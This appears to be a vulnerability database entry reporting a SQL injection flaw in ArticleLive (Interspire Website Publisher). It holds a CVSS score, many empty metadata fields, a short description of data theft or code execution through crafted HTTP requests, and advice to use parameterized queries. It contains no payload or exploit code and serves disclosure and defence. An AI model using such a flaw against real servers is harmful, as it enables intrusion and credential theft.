Vendor: ArticleLive
By: ra3ch
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ArticleLive
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
SQL Injection in ArticleLive (Interspire Website Publisher)
An attacker can exploit a SQL injection vulnerability in ArticleLive (Interspire Website Publisher) by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials, or even execute arbitrary code on the server.
Mitigation:
Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This ensures that user input is bound as a data value and is never parsed as part of the SQL statement.